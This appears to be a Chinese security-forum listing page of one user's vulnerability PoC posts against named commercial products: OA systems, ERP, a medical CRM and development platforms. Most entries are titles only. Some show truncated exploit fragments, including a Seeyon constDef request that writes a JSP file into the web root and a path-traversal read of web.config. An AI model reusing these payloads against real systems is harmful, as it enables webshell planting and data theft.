秃兔_秃兔安全

10W+25232

秃兔

9枚徽章兔窝大兔兔广东管理员超级版主

发布345

科荣 AIO 管理系统任意文件读取

import base64import requests def poc(ip, file_path): # 构造URL地址url = f’http://{ip}/UtilServlet’headers = { 登录可见余下内容

1年前

01038

九思-OA-任意文件上传

POC 2024你懂的

1年前

01037

邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞

POC 2024你懂的

1年前

010213

【渗透文库】充值缴费场景业务逻辑测试

测试描述：通过抓包工具分析充值缴费场景的接口内容及工作流程，逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及人脸、证书、短信验证码等认证要素，请参考对应的认证要素测试对应的测试前置...

等保测评渗透文库 # 渗透测试 # 等保测评

1年前

01020

宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞

POC 2024你懂的

1年前

01028

泛微e-cology9接口WorkPlanService前台SQL注入漏洞

POC 2024你懂的

1年前

01026

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...

POC 2024你懂的

1年前

010113

天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞

GET /HM/ Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1Host: xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firef...

POC 2024你懂的

1年前

01016

JeePlus快速开发平台resetpassword存在SQL注入漏洞

POC 2024你懂的

1年前

010115

金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞

POC 2024你懂的

1年前

010115

上一页 1…21 222324 25…35 下一页跳转

秃兔音乐盒